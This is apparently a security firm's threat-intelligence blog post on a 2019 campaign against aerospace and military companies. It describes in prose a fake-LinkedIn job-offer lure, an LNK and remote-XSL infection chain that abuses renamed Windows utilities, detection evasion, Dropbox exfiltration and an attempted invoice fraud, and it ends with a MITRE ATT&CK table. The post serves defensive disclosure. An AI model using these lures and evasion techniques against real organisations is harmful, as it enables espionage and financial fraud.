At the end of last year, we discovered targeted attacks against aerospace and military companies in Europe and the Middle East, active from September to December 2019. A collaborative investigation with two of the affected European companies allowed us to gain insight into the operation and uncover previously undocumented malware.

This blogpost will shed light on how the attacks unfolded. The full research can be found in our white paper, Operation In(ter)ception: Targeted attacks against European aerospace and military companies.

The attacks, which we dubbed Operation In(ter)ception based on a related malware sample named Inception.dll, were highly targeted and clearly intent on staying under the radar.

To compromise their targets, the attackers used social engineering via LinkedIn, hiding behind the ruse of attractive, but bogus, job offers. Having established an initial foothold, the attackers deployed their custom, multistage malware, along with modified open-source tools. Besides malware, the adversaries made use of living off the land tactics, abusing legitimate tools and OS functions. Several techniques were used to avoid detection, including code signing, regular malware recompilation and impersonating legitimate software and companies.

According to our investigation, the primary goal of the operation was espionage. However, in one of the cases we investigated, the attackers attempted to monetize access to a victim’s email account through a business email compromise (BEC) attack as the final stage of the operation.

While we did not find strong evidence connecting the attacks to a known threat actor, we discovered several hints suggesting a possible link to the Lazarus group, including similarities in targeting, development environment, and anti-analysis techniques used.

Initial compromise

As part of the initial compromise phase, the Operation In(ter)ception attackers had created fake LinkedIn accounts posing as HR representatives of well-known companies in the aerospace and defense industries. In our investigation, we’ve seen profiles impersonating Collins Aerospace (formerly Rockwell Collins) and General Dynamics, both major US corporations in the field.

With the profiles set up, the attackers sought out employees of the targeted companies and messaged them with fictitious job offers using LinkedIn’s messaging feature, as seen in Figure 1. (Note: The fake LinkedIn accounts no longer exist.)

Figure 1. A fake job offer sent via LinkedIn to employees at one of the targeted companies

Once the attackers had the targets’ attention, they snuck malicious files into the conversation, disguised as documents related to the job offer in question. Figure 2 shows an example of such a communication.

Figure 2. Communication between the attackers and an employee at one of the targeted companies

To send the malicious files, the attackers either used LinkedIn directly, or a combination of email and OneDrive. For the latter option, the attackers used fake email accounts corresponding with their fake LinkedIn personas, and included OneDrive links hosting the files.

The shared file was a password-protected RAR archive containing a LNK file. When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser.

That PDF, seemingly containing salary information for the reputed job positions, in reality served as a decoy; in the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe.

This enabled the attackers to get their initial foothold inside the targeted company and gain persistence on the compromised computer. Figure 3 illustrates the steps leading up to compromise.

Figure 3. Attack scenario from initial contact to compromise

Attacker tools and techniques

The Operation In(ter)ception attackers employed a number of malicious tools, including custom, multistage malware, and modified versions of open-source tools.

We have seen the following components:

  • Custom downloader (Stage 1)
  • Custom backdoor (Stage 2)
  • A modified version of PowerShdll – a tool for running PowerShell code without the use of powershell.exe
  • Custom DLL loaders used for executing the custom malware
  • Beacon DLL, likely used for verifying connections to remote servers
  • A custom build of dbxcli – an open-source, command-line client for Dropbox; used for data exfiltration

Under a typical scenario, the Stage 1 malware – the custom downloader – was downloaded by the remote XSL script (described in the Initial compromise section) and executed using the rundll32 utility. However, we also saw instances where the attackers used one of their custom DLL loaders to run the Stage 1 malware. The main purpose of the custom downloader is to download the Stage 2 payload and run it in its memory.

The Stage 2 payload is a modular backdoor in the form of a DLL written in C++. It periodically sends requests to the server and performs defined actions based on the received commands, such as send basic information about the computer, load a module, or change the configuration. While we didn’t recover any modules received by the backdoor from its C&C server, we did find indications that a module was used to download the PowerShdll.

Besides malware, the adversaries leveraged living off the land tactics, abusing legitimate tools and OS functions to perform various malicious operations, in an attempt to fly under the radar. As for specific techniques, we found that the attackers used WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware.

Figure 4 shows how the various components interacted during the malware’s execution.

Figure 4. Malware execution flow

Besides the living off the land techniques, we found that the attackers made special effort to remain undetected.

First, the attackers disguised their files and folders by giving them legitimate-sounding names. For this purpose, the attackers misused the names of known software and companies, such as Intel, NVidia, Skype, OneDrive and Mozilla. For example, we found malicious files with the following paths:

  • C:\ProgramData\DellTPad\DellTPadRepair.exe
  • C:\Intel\IntelV.cgi

Interestingly, it was not just malicious files that were renamed – the attackers also manipulated the abused Windows utilities. They copied the utilities to a new folder (e.g. C:\NVIDIA) and renamed them (e.g. regsvr32.exe was renamed to NvDaemon.exe)

Second, the attackers digitally signed some components of their malware, namely the custom downloader and backdoor, and the dbxcli tool. The certificate was issued in October 2019 – while the attacks were active – to 16:20 Software, LLC. According to our research, 16:20 Software, LLC is an existing company based in Pennsylvania, USA, incorporated in May 2010.

Third, we found that the Stage 1 malware was recompiled multiple times throughout the operation.

Finally, the attackers also implemented anti-analysis techniques in their custom malware, such as control-flow flattening and dynamic API loading.

Data gathering and exfiltration

According to our research, the attackers used a custom build of dbxcli, an open-source command-line client for Dropbox, to exfiltrate data gathered from their targets. Unfortunately, neither the malware analysis nor the investigation allowed us to gain insight into what files the Operation In(ter)ception attackers were after. However, the job titles of the employees targeted via LinkedIn suggest that the attackers were interested in technical and business-related information.

Business email compromise

In one of the investigated cases, the attackers didn’t just stop at data exfiltration – as a final stage of the operation, they attempted to monetize the access to a victim’s email account through a BEC attack.

First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account, as seen in Figure 5. For further communication with the customer, they used their own email address mimicking the victim’s.

Here, the attackers were unsuccessful – rather than paying the invoice, the customer responded with inquiries about the requested sum. As the attackers urged the customer to pay, the customer ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side.

Figure 5. BEC email sent from a victim’s compromised email account

Attribution hints

Although our investigation didn’t reveal compelling evidence tying the attacks to a known threat actor, we identified several hints suggesting a possible link with the Lazarus group. Notably, we found similarities in targeting, use of fake LinkedIn accounts, the development environment, and anti-analysis techniques used. Besides that, we have seen a variant of the Stage 1 malware that carried a sample of Win32/NukeSped.FX, which belongs to a malicious toolset that ESET attributes to the Lazarus group.

Conclusion

Our investigation uncovered a highly targeted operation notable for its compelling, LinkedIn-based social engineering scheme, custom modular malware and cunning detection evasion tricks. Interestingly, while Operation In(ter)ception showed all the signs of cyberespionage, the attackers apparently also had financial gain as a goal, as evidenced by the attempted BEC attack.

Special thanks to Michal Cebák for his work on this investigation.

For the full description of the attacks, as well as technical analysis of the previously undocumented malware and Indicators of Compromise (IoCs), please refer to our paper, Operation In(ter)ception: Targeted attacks against European aerospace and military companies.

IoCs collected from the attacks can also be found on the ESET GitHub repository.

MITRE ATT&CK techniques

Tactic ID Name Description
Initial Access T1194 Spearphishing via Service LinkedIn is used to contact the target and provide a malicious attachment.
Execution T1059 Command-Line Interface cmd.exe used to create a scheduled task to interpret a malicious XSL script via WMIC.
T1106 Execution through API Malware uses CreateProcessA API to run another executable.
T1086 PowerShell A customized .NET DLL is used to interpret PowerShell commands.
T1117 Regsvr32 The regsvr32 utility is used to execute malware components.
T1085 Rundll32 The rundll32 utility is used to execute malware components.
T1053 Scheduled Task WMIC is scheduled to interpret remote XSL scripts.
T1047 Windows Management Instrumentation WMIC is abused to interpret remote XSL scripts.
T1035 Service Execution A service is created to execute the malware.
T1204 User Execution The attacker relies on the victim to extract and execute a LNK file from a RAR archive received in an email attachment.
T1220 XSL Script Processing WMIC is used to interpret remote XSL scripts.
Persistence T1050 New Service A service is created to ensure persistence for the malware.
T1053 Scheduled Task Upon execution of the LNK file, a scheduled task is created that periodically executes WMIC.
Defense Evasion T1116 Code Signing Malware signed with a certificate issued for “16:20 Software, LLC”.
T1140 Deobfuscate/Decode Files or Information certutil.exe is used to decode base64-encoded malware binaries.
T1070 Indicator Removal on Host Attackers attempt to remove generated artifacts.
T1036 Masquerading Malware directories and files are named as, or similar to, legitimate software or companies.
T1027 Obfuscated Files or Information Malware is heavily obfuscated and delivered in base64-encoded form.
T1117 Regsvr32 The regsvr32 utility is used to execute malware components.
T1085 Rundll32 The rundll32 utility is used to execute malware components.
T1078 Valid Accounts Adversary uses compromised credentials to log into other systems.
T1220 XSL Script Processing WMIC is used to interpret remote XSL scripts.
Credential Access T1110 Brute Force Adversary attempts to brute-force system accounts.
Discovery T1087 Account Discovery Adversary queries AD server to obtain system accounts.
T1012 Query Registry Malware has ability to query registry to obtain information such as Windows product name and CPU name.
T1018 Remote System Discovery Adversary scans IP subnets to obtain list of other machines.
T1082 System Information Discovery Malware has ability to gather information such as Windows product name, CPU name, username, etc.
Collection T1005 Data from Local System Adversary collects sensitive data and attempts to upload it using the Dropbox CLI client.
T1114 Email Collection Adversary has access to a victim’s email and may utilize it for a business email compromise attack
Command and Control T1071 Standard Application Layer Protocol Malware uses HTTPS protocol.
Exfiltration T1002 Data Compressed Exfiltrated data is compressed by RAR.
T1048 Exfiltration Over Alternative Protocol Exfiltrated data is uploaded to Dropbox using its CLI client.
T1537 Transfer Data to Cloud Account Exfiltrated data is uploaded to Dropbox.